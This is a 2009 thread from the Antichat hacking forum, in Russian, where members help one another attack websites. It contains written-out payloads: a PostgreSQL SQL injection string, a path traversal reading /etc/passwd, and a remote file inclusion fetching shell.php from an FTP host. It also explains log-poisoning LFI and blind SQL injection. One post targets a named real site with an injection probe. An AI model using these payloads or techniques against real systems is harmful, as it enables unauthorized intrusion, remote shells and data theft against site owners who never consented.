25.10.2009, 19:39
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
1;select+table_name::text::int+from+information_sc hema. tables
|
|
|
25.10.2009, 21:18
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:
script.php?bla=ftp://login  wd@host/shell.php
Помогите плз. |
|
|
|
25.10.2009, 21:21
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от -m0rgan-
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:
script.php?bla=ftp://login wd@host/shell.php
Помогите плз. Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
25.10.2009, 21:30
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от AFoST
Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
Или на http и ftp проверка.
Сообщение от -m0rgan-
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:
script.php?bla=ftp://loginwd@host/shell.php
Помогите плз.
Пробуй через логи.
Последний раз редактировалось Ctacok; 27.10.2009 в 07:15..
|
|
|
|
25.10.2009, 22:00
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Что значит "Через логи" ?
Можна поподробнее?
|
|
|
|
25.10.2009, 22:06
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от -m0rgan-
Что значит "Через логи" ?
Можна поподробнее?
Это значит записать в лог об ошибках код на подобии <? phpinfo(); die(); ?> и проинклюдить файл.
|
|
|
|
25.10.2009, 22:10
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'
|
|
|
|
25.10.2009, 22:31
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от TELO
а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'
и снова 3 ий мускул ,без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов
|
|
|
|
25.10.2009, 23:05
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от eliteload
возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
А почему же нет?
|
|
|
|
26.10.2009, 00:48
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от L I G A
хрен шо там проведешь
Почему же? Можно провести, если конечно нет фильтрации. Если не будет вывода, то можно создать условие, при котором подбирать символы посимвольно, и если символ соответствует нужному, то возвращать верное значение page_id, если не верное, то возвращать заведомо неверное значение.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
